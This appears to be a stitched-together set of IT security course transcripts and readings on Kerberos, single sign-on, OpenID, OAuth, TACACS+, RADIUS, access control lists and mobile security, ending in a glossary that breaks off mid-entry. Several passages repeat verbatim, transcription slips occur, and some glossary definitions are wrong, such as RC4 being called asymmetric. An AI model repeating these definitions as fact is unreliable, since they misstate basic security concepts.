Aside from availability issues, if the central Kerberos servers compromised,
the attacker would be able to impersonate any user by generating valid Kerberos
tickets for their user account.
Kerberos enforces strict time requirements, requiring the client and
server clocks to be relatively closely synchronized,
otherwise authentication will fail.
This is usually accomplished by using NTP to keep both parties
synchronized using an NTP server.
The trust model of Kerberos is also problematic,
since it requires clients and services to have an established trust and
the Kerberos server in order to authenticate using Kerberos.
This means it's not possible for users to authenticate using Kerberos,
from unknown or untrusted clients.
So, things like BYOD or bring your own device and cloud computing,
are incompatible.
Or at least very challenging to implement securely with Kerberos authentication.
Now, as an IT support specialist, you're likely to encounter Kerberos
authentication, especially in environments running Microsoft Active directory.
Understanding how the underlying protocol functions will help when troubleshooting
issues that may come with it.
Kerberos, is a network authentication protocol that uses tickets to

allow entities to prove their identity over potentially insecure
channels to provide mutual authentication.
It also uses symmetric encryption to protect protocol messages from
eavesdropping and replay attacks.
The name Kerberos is taken from the greek mythical character of the same name,
a three headed guard dog protecting the gates to Hades the underworld.
Seems like an appropriate choice for an authentication protocol, don't you think.
Kerberos was originally developed at the Massachusetts Institute of Technology
in the US.
And was published in the 1980s as version four.
Years later in 1993 Version 5 was published.
Today, Kerberos supports AES encryption and
implements check sums to ensure data integrity and confidentiality.
When joined to a Windows Domain, Windows 2000 and
newer versions will use Kerberos as the default authentication protocol.
Microsoft also implemented their own Kerberos service,
with some modifications to the open protocol.
Like the addition of the RC4 stream cipher, we mentioned tickets earlier,
which is a sort of token that proves your identity.
They can be used for authenticating to services,
protected using Kerberos or in other words are within the Kerberos realm.
The authentication tickets let users authenticate two services without
requiring user name and password authentication, for
every service individually.
A ticket will expire after some time, but has provisions for
automatic transparent renewal of the ticket.
Let's run down the details of how the Kerberos protocol operates.
First, a user that wants to authenticate, enters their user name and
password on their client machine.
Their Kerberos client software, will then take the password and
generate a symmetric encryption key from it.
Next, the client sends a plain text message to the Kerberos AS or
authentication server which includes the user ID of the authenticating user.
The password or secret key derived from the password aren't transmitted.
The AS uses the user ID to check if there's an account in
the authentication database, like an active directory server.
If so the AS will generate the secret key using the hashed
passwords stored in the key distribution center server.
The AS will then use the secret key to encrypt and
send a message containing the client TGS session key.
This is a secret key used for encrypting communications, with the ticket
granting service or TGS, which is already known by the authentication server.
The AS also sends a second message, with a ticket granting ticket or
a TGT, which is encrypted using the TGS secret key.
The ticket granting ticket has information like the client ID,
Ticket validity period and the client ticket granting service session key.
So the first message can be decrypted using the shared
secret key derived from the user password.
It then provides the secret key,
that can decrypt the second message giving the client a valid ticket granting ticket.
Now, the client has enough information to authenticate with the ticket granting
server.
Since the client has authenticated and received a valid ticket granting ticket,
it can use the ticket granting ticket,
to request access to services from within the Kerberos realm.
This is done by sending a message to the ticket granting service,
with the encrypted ticket granting ticket received from the AS earlier,
along with the service name or ID the client is requesting access to.
The client also sends a message,
containing an authenticator which has the client ID and a time stamp,
that's encrypted with the client ticket granting ticket session key from the AS.
The ticket granting service decrypt the ticket granting ticket,
using the ticket granting service secret key.
Which provides the ticket granting service,
with the client ticket granting service session key.
It then uses the key, to decrypt the authenticator message.
Next it checks the client ID of these two messages to ensure they match.
If they do, it sends two messages back to the client.
The first one, contains the client to server ticket which is comprised of
the client ID, client address, validity period and
the client server session key, encrypted using the services Secret key.
The second message, contains the client server session key itself and
is encrypted using the client ticket granted service session key.
Finally, the client has enough information to authenticate itself to
the service server or SS.
The client sends two messages to the SS, the first message is the encrypted client
to server ticket, received from the ticket granting service.
The second, is a new authenticator with the client ID and
timestamp encrypted using the client server session key.
The SS decrypt the first message,
using its secret key which provides it with the client server session key.
The key is then used to decrypt the second message and it compares the client ID in
the authenticator to the one included in the client to server ticket.
If these ideas match, then the ss sends a message containing the timestamp from
the client supplied authenticator,
encrypted using the client server session key.
The client then decrypt this message and
checks at the timestamp is correct authenticating the server.
If this all succeeds,
then the server grants access to the requested service on the client.
Wow, okay are you with me, I know that was a lot.
Kerberos has received some criticism because it's a single monolithic service.
This creates a single point of failure danger, if the Kerberos service goes down,
new users won't be able to authenticate and log in.
Aside from availability issues, if the central Kerberos servers compromised,
the attacker would be able to impersonate any user by generating valid Kerberos
tickets for their user account.
Kerberos enforces strict time requirements, requiring the client and
server clocks to be relatively closely synchronized,
otherwise authentication will fail.
This is usually accomplished by using NTP to keep both parties
synchronized using an NTP server.
The trust model of Kerberos is also problematic,
since it requires clients and services to have an established trust and
the Kerberos server in order to authenticate using Kerberos.
This means it's not possible for users to authenticate using Kerberos,
from unknown or untrusted clients.
So, things like BYOD or bring your own device and cloud computing,
are incompatible.
Or at least very challenging to implement securely with Kerberos authentication.
Now, as an IT support specialist, you're likely to encounter Kerberos
authentication, especially in environments running Microsoft Active directory.
Understanding how the underlying protocol functions will help when troubleshooting
issues that may come with it.
Single sign-on or SSO

is an authentication concept that allows
users to authenticate once to be granted
access to a lot of different services and applications.
Since re-authentication for each service isn't needed,
users don't need multiple sets of usernames and
passwords across a mix of applications and services.
SSO is accomplished by authenticating
to a central authentication server,
like an LDAP server.
This then provides a cookie or token that can be used to
get access to applications configured to use SSO.
Kerberos is actually a good example
of an SSO authentication service.
The user would authenticate
against the Kerberos service once,
which would then grant them a ticket-granting ticket.
This can then be presented to
the ticket-granting service in
place of traditional credentials.
The user can enter credentials once and
gain access to a variety of services.
SSO is really convenient.
It allows users to have one set of
credentials that grant access to lots of services,
making it less likely that passwords will
be written down or stored insecurely.
This should also reduce the overhead for
password assistance support and removes
time spent re-authenticating throughout the workday.
So what's the downside?
An attacker that manages to compromise an account
has a lot more access under an SSO scheme.
User credentials will grant
access to all applications and
services that that account is permitted to access.
A big plug here for using
multi-factor authentication in conjunction
with an SSO scheme.
But this opens a new channel of attack,
theft of SSO session cookies or tokens.
Instead of targeting credentials directly,
attackers can try to steal the SSO tokens directly,
which will permit wide access
if even for a short amount of time.
Stealing these tokens also lead to an attacker
dodge multi-factor authentication protections,
since the session token permits access without
requiring full authentication until a token expires.
An example of an SSO system is
the OpenID decentralized authentication system.
This is an open standard that allows
participating sites known as relying parties
to allow authentication of users
utilizing a third-party authentication service.
This allows sites to permit authentication without
requiring the site itself
to have authentication infrastructure,
which can be tricky to implement and maintain.
It also lets users access a site
without requiring them to create a new account,
simplifying access management across
a wide variety of sites.
Instead, a user just needs to
already have an account with an identity provider.
To ask for authentication, first,
the relying party looks up the OpenID provider,
then establishes a shared secret with
the provider if one doesn't already exist.
This shared secret will be used to
validate the OpenID provider messages.
Then the user will be redirected or asked to
authenticate in a new window through
the identities providers login flow.
Once authenticated, the user will be prompted to
confirm if they trust the relying party or not.
Once confirmed,
credentials are relayed to the relying party,
typically in the form of a token,
not actual user credentials,
which indicates the user is
now authenticated to the service.
Single sign-on or SSO
is an authentication concept that allows
users to authenticate once to be granted
access to a lot of different services and applications.
Since re-authentication for each service isn't needed,
users don't need multiple sets of usernames and
passwords across a mix of applications and services.
SSO is accomplished by authenticating
to a central authentication server,
like an LDAP server.
This then provides a cookie or token that can be used to
get access to applications configured to use SSO.
Kerberos is actually a good example
of an SSO authentication service.
The user would authenticate
against the Kerberos service once,
which would then grant them a ticket-granting ticket.
This can then be presented to
the ticket-granting service in
place of traditional credentials.
The user can enter credentials once and
gain access to a variety of services.
SSO is really convenient.
It allows users to have one set of
credentials that grant access to lots of services,
making it less likely that passwords will
be written down or stored insecurely.
This should also reduce the overhead for
password assistance support and removes
time spent re-authenticating throughout the workday.
So what's the downside?
An attacker that manages to compromise an account
has a lot more access under an SSO scheme.
User credentials will grant
access to all applications and
services that that account is permitted to access.
A big plug here for using
multi-factor authentication in conjunction
with an SSO scheme.
But this opens a new channel of attack,
theft of SSO session cookies or tokens.
Instead of targeting credentials directly,
attackers can try to steal the SSO tokens directly,
which will permit wide access
if even for a short amount of time.
Stealing these tokens also lead to an attacker
dodge multi-factor authentication protections,
since the session token permits access without
requiring full authentication until a token expires.
An example of an SSO system is
the OpenID decentralized authentication system.
This is an open standard that allows
participating sites known as relying parties
to allow authentication of users
utilizing a third-party authentication service.
This allows sites to permit authentication without
requiring the site itself
to have authentication infrastructure,
which can be tricky to implement and maintain.
It also lets users access a site
without requiring them to create a new account,
simplifying access management across
a wide variety of sites.
Instead, a user just needs to
already have an account with an identity provider.
To ask for authentication, first,
the relying party looks up the OpenID provider,
then establishes a shared secret with
the provider if one doesn't already exist.
This shared secret will be used to
validate the OpenID provider messages.
Then the user will be redirected or asked to
authenticate in a new window through
the identities providers login flow.
Once authenticated, the user will be prompted to
confirm if they trust the relying party or not.
Once confirmed,
credentials are relayed to the relying party,
typically in the form of a token,
not actual user credentials,
which indicates the user is
now authenticated to the service.
Earlier we covered authentication,

the First component of the three A's of security.
Next up, we'll cover authorization,
which is usually tightly coupled with authentication.
While authentication is related
to verifying the identity of a user,
authorization pertains to describing what
the user account has access to or doesn't have access to.
These are separate and distinct components
of AAA that have different purposes.
A user may successfully authenticate to
a system by presenting valid credentials,
but if the username they authenticated as
isn't also authorized to access the system in question,
they'll be denied access.
When we talked about Kerberos earlier,
the user authenticated and
received a ticket granting ticket.
This can then be used to request access to
a specific service by sending
the request to the ticket granting service.
This is when authorization comes into play,
since the ticket granting service will decide whether
or not the user in question is
permitted to access the service being requested.
If they're not permitted or
authorized to access to service,
the request would be denied
by the ticket granting service.
If the user is authorized,
the ticket granting service,
would return a ticket,
which authorized the user to access the service.
One very popular open standard for
authorization and access delegation is OAuth,
used by companies like Google, Facebook, and Microsoft.
Mobile Security Methods

Laptop computers, tablets, smartphones, and other mobile devices allow people to remain
productive from various locations, such as at home or while traveling. This increased
flexibility raises various security concerns that IT departments need to address. This reading
provides information about the current security measures used to protect mobile devices.
Common mobile security threats and challenges
Many of the security threats associated with mobile devices are the same as those of
traditionally networked devices, such as hacking and malware. However, mobile devices face
additional threats that other devices do not.
Here are some threats facing mobile device security:
1. Phishing: Phishing attacks can use SMS messaging, email accounts, messages via
numerous social media applications, or malicious links in browsers to target your
mobile devices.
2. Malicious applications (malware): Malware can take the form of apps designed to
collect and transmit personal and corporate information to third parties.
3. Insecure Wi-Fi and “meddler in the middle” attacks: An attacker places themself in
the middle of two hosts that think they're communicating directly. The attacker may
monitor the information from these hosts and potentially modify it in transit. Open or
"free" Wi-Fi hotspots are especially susceptible to meddler in the middle and similar
attacks.
4. Poor update habits for devices and apps: An example is failure to install security
patches regularly deployed through software and firmware updates. Unpatched
devices and applications often contain exploits and vulnerabilities that attackers may
use to collect sensitive data.
You can imagine how all these issues could threaten confidentiality, integrity, or access (the
CIA triad)—but confidentiality is of particular concern for mobile security.
Security measures used to protect mobile devices
There are several security measures in place to protect mobile devices from these security
concerns.
Screen Locks
Screen locks are methods for preventing unauthorized access to a device. They can be
particularly effective for diminishing risks associated with the loss or theft of the device.
These measures include:
 Facial recognition: uses a device’s camera to unlock the device once the user’s face is
recognized
 PIN codes: uses a sequence of four or more numbers to unlock the device
 Fingerprint recognition: matches a user’s fingerprint with a saved image of the
fingerprint to unlock the device
 Pattern uses: uses a pattern that users must trace to unlock the device
Remote wipes
Remote wipes are methods to remove data from a device remotely. Remote wiping is another
way to diminish risks associated with the loss or theft of a device and include:
 Locator applications: apps that help users find lost devices

 OS updates: security patches regularly deployed through Operating System updates
(as well as firmware and application updates)
 Device encryption: encryption techniques that protect the device from unauthorized
access
 Remote backup applications: apps that allow administrators to remotely remove
applications that compromise security
 Failed login attempt restrictions: stops access, either completely or for a set period of
time, after too many failed attempts to log in
 Antivirus/Antimalware: software packages for mobile devices often offered by the
same vendors as desktop Antivirus programs
 Firewalls: either devices or software that check incoming network traffic and keep out
unwanted traffic
Policies and procedures

IT departments establish policies and procedures to ensure users don’t make security
mistakes. They typically include mobile-specific policies such as acceptable use guidelines,
preferred mobile security practices, and security platforms or services.
Once IT staff and management collaborate to build a mobile security policy, there is still work
to do. Organizations must find the best way to outline this policy and communicate it to
users. A policy is only effective if users understand and adhere to it.
Key takeaways:
As your organization embraces the advantages of mobile devices and wireless networks, your
IT security strategies must account for the specific risks, vulnerabilities, and threats
associated with mobile computing by:
1. Monitoring for common mobile security concerns such as phishing, malicious

applications, insecure Wi-Fi, and poor upgrade habits and applying the current
methods for addressing them
2. Implementing security measures to protect mobile devices like screen lock and
remote wipes
3. Providing clear mobile security policies and procedures and communicating them to
users
Citations:
# Title Link
Top 4 mobile security threats https://www.techtarget.com/searchmobilecomputing/tip/Top-
1
and challenges for businesses mobile-security-threats-and-challenges-for-businesses
The ultimate guide to mobile
https://www.techtarget.com/searchmobilecomputing/The-ultim
2 device security in the
guide-to-mobile-device-security-in-the-workplace
workplace
What Is the CIA Triad?
Understanding the significance
of the three foundational
3 https://www.f5.com/labs/articles/education/what-is-the-cia-tri
information security
principles: confidentiality,
integrity, and availability.
OAuth is an open standard that allows users to grant third party websites and
applications access to their information without sharing account credentials.
This can be thought of as a form of access delegation because access to the user's
account is being delegated to the third party.
This is accomplished by prompting the user to confirm that they agree to permit
the third party access to certain information about their account.
Typically, this prompt will specifically list which pieces of information or
access are being requested.
Once confirmed, the identity provider will supply the third party with a token that
gives them access to the user's information.
This token can then be used by the third party to access data or
services offered by the identity provider directly on behalf of the user.
OAuth is commonly used to grant access to third party applications to APIs
offered by large internet companies like Google, Microsoft and Facebook.
Let's say you want to use a third party meme creation website.
This website lets you create memes using templates and
gives you the option to save your creations and email them to your friends.
Instead of the site sending the emails directly,
which would appear to be coming from an address your friends wouldn't recognize.
The site uses OAuth to get permission to send the memes using your email account
directly.
This is done by making an OAuth request to your email provider.
Once you approve this request, the email provider issues an access token
to the site which grants the site access to your email account.
The access token would have a scope which says that it can only be used to access
email, not other services associated with the account.
So it can access email but not your Cloud storage files or calendar for example,
it's important that users pay attention to what third party is requesting access.
And what exactly they're granting access to.
OAuth permissions can be used in phishing style attacks to gain access to accounts
without requiring credentials to be compromised.
This works by sending phishing emails to potential victims that look like
legitimate OAuth authorization requests.
Which asked the user to grant access to some aspects of their account through
OAuth.
Once the user grants access,
the attacker has access to the account through the OAuth authorization token.
This was used in an OAuth based worm attack in early 2017.
There was a rash of phishing emails that appear to be from a friend or
colleague who wanted to share a Google doc.
When the sharing link was followed, the victim was prompted to log in and
authorized access to email, documents.
And contacts for
some third party service which only identified itself as the name Google Apps.
But it was actually a malicious service that would
then email contacts from their email account perpetuating the attack.
It's important to distinguish between OAuth and open ID.
OAuth is specifically an authorization system and
open ID is an authentication system though they're usually used together.
Open ID connect is an authentication layer built on top of OAuth point designed
to improve upon open ID, and build better integration with OAuth authorizations.
Sense to Tax plus is a full A A system.
It also handles authorization along with authentication.
This is done once a user is authenticated by allowing or disallowing access for
the user account to run certain commands or access certain devices.
This lets you not only allow admin access for users that administer devices while
still allowing less privileged access to other users when necessary.
Here's an example, since your networking teams are responsible for configuring and
maintaining your network switches.
Routers and other infrastructure, you'd give them admin access to your network and
equipment.
Meanwhile, you can have limited read only access to your support team since
they don't need to be able to make changes to switch configurations in their jobs.
Read only access is enough for them to troubleshoot problems.
The rest of the user accounts would have no access at all and
wouldn't be permitted to connect to the networking infrastructure.
So more sophisticated or configurable AAA systems may even allow further
refinement of authorization down to the command level.
This gives you much more flexibility in how your access is granted to specific
users or groups in your organization.
Radius also allows you to authorize network access.
For example, you may want to permit some users to have WiFi and
VPN access while others may not need this.
When they authenticate to the radius server, if the authentication succeeds,
the radius server returns configuration information to the network access server.
This includes authorizations,
which specifies what network services the user is permitted to access.
Supplemental Reading for Authorization

This was used in an OAuth-based worm-like attack in early 2017, with a rash of phishing
emails that appeared to be from a friend or colleague who wants to share a Google
Document.
An access control list or ACL is a way of defining permissions or
authorizations for objects.
The most common case you may encounter deals with file system permissions.
A file system would have an ACL which is a table or database,
with a list of entries specifying access rights for individuals or groups for
various objects on the file system like folders, files, or programs.
These individual access permissions per object are called access control
entries and they make up the ACL.
Individual entries can define permissions controlling whether or not a user or
group can read, write or execute objects.
ACLs are also used extensively in network security,
applying access controls to routers, switches, and firewalls.
Network ACLs are used for restricting and
controlling access to host their services running on hosts within your network.
Network ACLs can be defined for incoming and outgoing traffic.
They can also be used to restrict external access to systems and limit outgoing
traffic to enforce policies or to prevent unauthorized outbound data transfers.
Last but not least, the final A of the triple AAA's of security is accounting.
This means keeping records of what resources and
services your users access or what they did when they were using your systems.
A critical component of this is auditing which involves reviewing these records to
ensure that nothing is out of the ordinary.
If we're watching and recording usage of our systems but
never actually checking the usage data, that's not super useful.
So what exactly do counting systems keep track of?
Well, that depends on the purpose and intent of the system.
For example,
a TACACS+ server would be more concerned with keeping track of user authentication.
What systems they authenticated to and
what commands they ran during their session.
This is because TACACS+ is a device access AAA system that manages
who has access to your network devices and what they do on them.
Cisco's AAA system supports accounting of individual commands
executed connection to and from network devices.
Commands executed in privileged mode and network services and
system details like configuration reloads or reboots.
Radius would track details like session duration, client location and bandwidth or
other resources used during the session.
This is because radius is a network access AAA system so
it tracks details about network access and usage.
Radius accounting kicks off with the network access server sending
an accounting request packet to the accounting server that contains
an event record to be logged.
This starts the accounting session on the server.
The server replies with an accounting response indicating that the message was
received.
The nass will continue sending periodic accounting messages with statistics
of the session until an accounting stop packet is received.
Radius accounting can be used for billing purposes by ISPs.
Because it records the length of a session and the amount of data sent and
received by the user.
This data can also be used to enforce data or time quotas, limiting the duration of
sessions or restricting the amount of data that can be sent or received.
But this accounting information isn't detailed and
won't contain specifics of what exactly the user did during the session.
Information, like websites visited or what protocols were used aren't recorded.
Module 3 Glossary
Access Control Entries: The individual access permissions per object that make up the ACL
Access Control List (ACL): It is a way of defining permissions or authorizations for objects
Accounting: Keeping records of what resources and services your users access or what they did when they
were using your systems
Auditing: It involves reviewing records to ensure that nothing is out of the ordinary
Authentication: A crucial application for cryptographic hash functions
Authentication server (AS): It includes the user ID of the authenticating user
Authorization: It pertains to describing what the user account has access to or doesn't have access to
Bind: It is how clients authenticate to the server
Biometric authentication: Authentication that uses Biometric data
Certificate Revocation List (CRL): A means to distribute a list of certificates that are no longer valid
Client certificates: They operate very similarly to server certificates but are presented by clients and allow
servers to authenticate and verify clients
Counter-based tokens: They use a secret seed value along with the secret counter value that's
incremented every time a one-time password is generated on the device
Data information tree: A structure where objects will have one parent and can have one or more children
that belong to the parent object
Distinguished name (DN): A unique identifier for each entry in the directory
Extensible authentication protocol (EAP over LAN, or EAPOL): A standard authentication protocol
Identification: The idea of describing an entity uniquely
Kerberos: A network authentication protocol that uses tickets to allow entities to prove their identity over
potentially insecure channels to provide mutual authentication
Lightweight Directory Access Protocol (LDAP): An open industry-standard protocol for accessing and
maintaining directory services; the most popular open-source alternative to the DAP
Multifactor authentication (MFA): A system where users are authenticated by presenting multiple pieces
of information or objects
Network time protocol (NTP): A network protocol used to synchronize the time between the
authenticator token and the authentication server
OAuth: An open standard that allows users to grant third-party websites and applications access to their
information without sharing account credentials
One-time password (OTP): A short-lived token, typically a number that's entered along with a username
and password
One-time password (OTP) tokens: Another very common method for handling multifactor
OpenID: An open standard that allows participating sites known as Relying Parties to allow authentication
of users utilizing a third party authentication service
Organizational units (OUs): Folders that let us group related objects into units like people or groups to
distinguish between individual user accounts and groups that accounts can belong to
Physical tokens: They take a few different forms, such as a USB device with a secret token on it, a
standalone device which generates a token, or even a simple key used with a traditional lock
Remote Authentication Dial-in User Service (RADIUS): A protocol that provides AAA services for users
on a network
Risk mitigation: Understanding the risks your systems face, take measures to reduce those risks, and
monitor them
Security keys: Small embedded cryptoprocessors, that have secure storage of asymmetric keys and
additional slots to run embedded code
Single Sign-on (SSO): An authentication concept that allows users to authenticate once to be granted
access to a lot of different services and applications
StartTLS: It permits a client to communicate using LDAP v3 over TLS
TACACS+: It is a device access AAA system that manages who has access to your network devices and
what they do on them
Ticket granting service (TGS): It decrypts the Ticket Granting Ticket using the Ticket Granting Service
secret key, which provides the Ticket Granting Service with the client Ticket Granting Service session key
Time-based token (TOTP): A One-Time-Password that's rotated periodically
U2F (Universal 2nd Factor): It's a standard developed jointly by Google, Yubico and NXP Semiconductors
that incorporates a challenge-response mechanism, along with public key cryptography to implement a
more secure and more convenient second-factor authentication solution
Unbind: It closes the connection to the LDAP server
XTACACS: It stands for Extended TACACS, which was a Cisco proprietary extension on top of TACACS
Terms and their definitions from previous weeks

A
Advanced Encryption Standard (AES): The first and only public cipher that's approved for use with top
secret information by the United States National Security Agency
Asymmetric encryption: Systems where different keys are used to encrypt and decrypt

Availability: Means that the information we have is readily accessible to those people that should have it
Backdoor: A way to get into a system if the other methods to get in a system aren't allowed, it's a secret
entryway for attackers
Baiting: An attack that happens through actual physical contact, enticing a victim to do something
Block ciphers: The cipher takes data in, places that into a bucket or block of data that's a fixed size, then
encodes that entire block as one unit
Bots: Machines compromised by malware that are utilized to perform tasks centrally controlled by an
attacker
Brute force attacks: A common password attack which consists of just continuously trying different
combinations of characters and letters until one gets access
CA (Certificate authority): It's the entity that's responsible for storing, issuing, and signing certificates. It's
a crucial component of the PKI system
Caesar cipher: A substitution alphabet, where you replace characters in the alphabet with others usually
by shifting or rotating the alphabet, a set of numbers or characters
CBC-MAC (Cipher block chaining message authentication codes): A mechanism for building MACs using
block ciphers
Central repository: It is needed to securely store and index keys and a certificate management system of
some sort makes managing access to storage certificates and issuance of certificates easier
Certificate fingerprints: These are just hash digests of the whole certificate, and aren't actually fields in
the certificate itself, but are computed by clients when validating or inspecting certificates
Certificate Revocation List (CRL): A means to distribute a list of certificates that are no longer valid
Certificate Signature Algorithm: This field indicates what public key algorithm is used for the public key
and what hashing algorithm is used to sign the certificate
Certificate-based authentication: It is the most secure option, but it requires more support and
management overhead since every client must have a certificate
Certificate Signature Value: The digital signature data itself

CIA Triad: Confidentiality, integrity, and availability. Three key principles of a guiding model for designing
information security policies
CMACs (Cipher-based Message Authentication Codes): The process is similar to HMAC, but instead of
using a hashing function to produce a digest, a symmetric cipher with a shared keys used to encrypt the
message and the resulting output is used as the MAC
Code signing certificates: It is used for signing executable programs and allows users of these signed
applications to verify the signatures and ensure that the application was not tampered with
Cross-site scripting (XSS): A type of injection attack where the attacker can insert malicious code and
target the user of the service
Cryptanalysis: Looking for hidden messages or trying to decipher coded message
Cryptography: The overarching discipline that covers the practice of coding and hiding messages from
third parties
Cryptology: The study of cryptography
Cryptosystem: A collection of algorithms for key generation and encryption and decryption operations
that comprise a cryptographic service
Cryptographic hashing: It is distinctly different from encryption because cryptographic hash functions
should be one directional
Data binding and sealing: It involves using the secret key to derive a unique key that's then used for
encryption of data
Decryption: The reverse process from encryption; taking the garbled output and transforming it back into
the readable plain text
Denial-of-Service (DoS) attack: An attack that tries to prevent access to a service for legitimate users by
overwhelming the network or server
DES (Data Encryption Standard): One of the earliest encryption standards
Deterministic: It means that the same input value should always return the same hash value
DH (Diffie-Hellman): A popular key exchange algorithm, named for its co-inventors
Dictionary attack: A type of password attack that tries out words that are commonly used in passwords,
like password, monkey, football

DNS Cache Poisoning Attack: It works by tricking a DNS server into accepting a fake DNS record that will
point you to a compromised DNS server
DSA (Digital Signature Algorithm): It is another example of an asymmetric encryption system, though its
used for signing and verifying data
ECDH & ECDSA: Elliptic curve variants of Diffie-Hellman and DSA, respectively
Eliptic curve cryptography (ECC): A public key encryption system that uses the algebraic structure of
elliptic curves over finite fields to generate secure keys
Encapsulating security payload: It's a part of the IPsec suite of protocols, which encapsulates IP packets,
providing confidentiality, integrity, and authentication of the packets
Encryption: The act of taking a message (plaintext), and applying an operation to it (cipher), so that you
receive a garbled, unreadable message as the output (ciphertext)
Encryption algorithm: The underlying logic or process that's used to convert the plaintext into ciphertext
End-entity (leaf certificate): A certificate that has no authority as a CA
Entropy pool: A source of random data to help seed random number generators
Evil twin: The premise of an evil twin attack is for you to connect to a network that is identical to yours but
that is controlled by an attacker. Once connected to it, they will be able to monitor your traffic
FIPS (Federal Information Processing Standard): The DES that was adopted as a federal standard for
encrypting and securing government data
Forward secrecy: This is a property of a cryptographic system so that even in the event that the private key
is compromised, the session keys are still safe
Frequency analysis: The practice of studying the frequency with which letters appear in ciphertext
Full disk encryption (FDE): It is the practice of encrypting the entire drive in the system
Hash collisions: Two different inputs mapping to the same output

Hashing (Hash function): A type of function or operation that takes in an arbitrary data input and maps it
to an output of a fixed size, called a hash or a digest
HMAC (Keyed-Hash Message Authentication Codes): It uses a cryptographic hash function along with a
secret key to generate a MAC
HTTPS: Hypertext Transfer Protocol Secure is a secure version of HTTP that ensures the communication
your web browser has with the website is secured through encryption
Injection attacks: A common security exploit that can occur in software development and runs rampant on
the web, where an attacker injects malicious code
Intermediary (subordinate) CA: It means that the entity that this certificate was issued to can now sign
other certificates
IPsec (Internet Protocol security): A VPN protocol that was designed in conjunction with IPv6
Issuer Name: This field contains information about the authority that signed the certificate
Kerckhoff's principle: A principle that states that a cryptosystem, or a collection of algorithms for key
generation and encryption and decryption operations that comprise a cryptographic service should remain
secure, even if everything about the system is known except for the key
Key: A crucial component of a cipher, which introduces something unique into your cipher
Key length: It defines the maximum potential strength of the system
Key signing parties: Organized by people who are interested in establishing a web of trust, and
participants perform the same verification and signing
Key size: It is the total number of bits or data that comprises the encryption key
L2TP (Layer 2 Tunneling Protocol): It is typically used to support VPNs
MACs (Message Authentication Codes): A bit of information that allows authentication of a received
message, ensuring that the message came from the alleged sender and not a third party masquerading as
them
Malware: A type of malicious software that can be used to obtain your sensitive information or delete or
modify files
Meddler in the middle (formerly known as Man in the Middle): An attack that places the attacker in the
middle of two hosts that think they're communicating directly with each other
MD5: A popular and widely used hash function designed in the early 1990s as a cryptographic hashing
function
MIC (Message Integrity Check): It is essentially a hash digest of the message in question
NIST: National Institute of Standards and Technology
Password salt: Additional randomized data that's added into the hashing function to generate the hash
that's unique to the password and salt combination
PGP (Pretty Good Privacy) encryption: An encryption application that allows authentication of data
along with privacy from third parties relying upon asymmetric encryption to achieve this
Phishing attack: It usually occurs when a malicious email is sent to a victim disguised as something
legitimate
Ping flood: It sends tons of ping packets to a system. If a computer can't keep up with this, then it's prone
to being overwhelmed and taken down
PKI system: A system that defines the creation, storage and distribution of digital certificates
Pseudo-random: Something that isn't truly random
Public key authentication: A key pair is generated by the user who wants to authenticate
Public key signatures: Digital signature generated by composing the message and combining it with the
private key
RA (Registration Authority): It is responsible for verifying the identities of any entities requesting
certificates to be signed and stored with the CA
Rainbow table attacks: To trade computational power for disk space by pre-computing the hashes and
storing them in a table
Rainbow tables: A pre-computed table of all possible password values and their corresponding hashes
Random numbers: A very important concept in encryption because it avoids some kind of pattern that an
adversary can discover through close observation and analysis of encrypted messages over time
Ransomware: A type of attack that holds your data or system hostage until you pay some sort of ransom
RC4 (Rivest Cipher 4): Asymmetric stream cipher that gained widespread adoption because of its
simplicity and speed
Remote attestation: The idea of a system authenticating its software and hardware configuration to a
remote system
Rogue Access Point (AP) Attack: An access point that is installed on the network without the network
administrator's knowledge
Root certificate authority: They are self signed because they are the start of the chain of trust, so there's
no higher authority that can sign on their behalf
RSA: One of the first practical asymmetric cryptography systems to be developed, named for the initials of
the three co-inventors: Ron Rivest, Adi Shamir and Leonard Adleman
Screen lock: A security feature that helps prevent unwanted access by creating an action you have to do to
gain entry
Secure channel: It is provided by IPsec, which provides confidentiality, integrity, and authentication of
data being passed
Secure element: It's a tamper resistant chip often embedded in the microprocessor or integrated into the
mainboard of a mobile device
Secure Shell (SSH): A secure network protocol that uses encryption to allow access to a network service
over unsecured networks
Security through obscurity: The principle that if no one knows what algorithm is being used or general
security practices, then one is safe from attackers
Self-signed certificate: This certificate has been signed by the same entity that issued the certificate
Serial number: A unique identifier for their certificate assigned by the CA which allows the CA to manage
and identify individual certificates
Session key: The shared symmetric encryption key using TLS sessions to encrypt data being sent back and
forth
SHA1: It is part of the secure hash algorithm suite of functions, designed by the NSA and published in 1995
Shannon's maxim: It states that the system should remain secure, even if your adversary knows exactly
what kind of encryption systems you're employing, as long as your keys remain secure
Social engineering: An attack method that relies heavily on interactions with humans instead of
computers
Spear phishing: Phishing that targets individual or group - the fake emails may contain some personal
information like your name, or the names of friends or family
SQL Injection Attack: An attack that targets the entire website if the website is using a SQL database
SSL 3.0: The latest revision of SSL that was deprecated in 2015
SSL/TLS Client Certificate: Certificates that are bound to clients and are used to authenticate the client
to the server, allowing access control to a SSL/TLS service
SSL/TLS Server Certificate: A certificate that a web server presents to a client as part of the initial secure
setup of an SSL, TLS connection
Steganography: The practice of hiding information from observers, but not encoding it
Stream ciphers: It takes a stream of input and encrypts the stream one character or one digit at a time,
outputting one encrypted character or digit at a time
Subject: This field contains identifying information about the entity the certificate was issued to
Subject Public Key Info: These two subfields define the algorithm of the public key along with the public
key itself
Substitution cipher: An encryption mechanism that replaces parts of your plaintext with ciphertext
Symmetric key algorithm: Encryption algorithms that use the same key to encrypt and decrypt messages
TLS 1.2: The current recommended revision of SSL
TLS 1.2 with AES GCM: A specific mode of operation for the AES block cipher that essentially turns it into
a stream cipher
TLS Handshake: A mechanism to initially establish a channel for an application to communicate with a
service
TPM (Trusted Platform Module): This is a hardware device that's typically integrated into the hardware
of a computer, that's a dedicated crypto processor
Transport mode: One of the two modes of operations supported by IPsec. When used, only the payload of
the IP packet is encrypted, leaving the IP headers untouched
Trusted execution environment (TEE): It provides a full-blown isolated execution environment that runs
alongside the main OS
Tunnel: It is provided by L2TP, which permits the passing of unmodified packets from one network to
another
Tunnel mode: One of the two modes of operations supported by IPsec. When used, the entire IP packet,
header, payload, and all, is encrypted and encapsulated inside a new IP packet with new headers
Username and password authentication: Can be used in conjunction with certificate authentication,
providing additional layers of security
Validity: This field contains two subfields, Not Before and Not After, which define the dates when the
certificate is valid for
Version: What version of the X.509 standard certificate adheres to
VPN (Virtual Private Network): A secure method of connecting a device to a private network over the
internet
Web of trust: It is where individuals instead of certificate authorities sign other individuals' public keys
Worms: They are similar to viruses except that instead of having to attach themselves onto something to
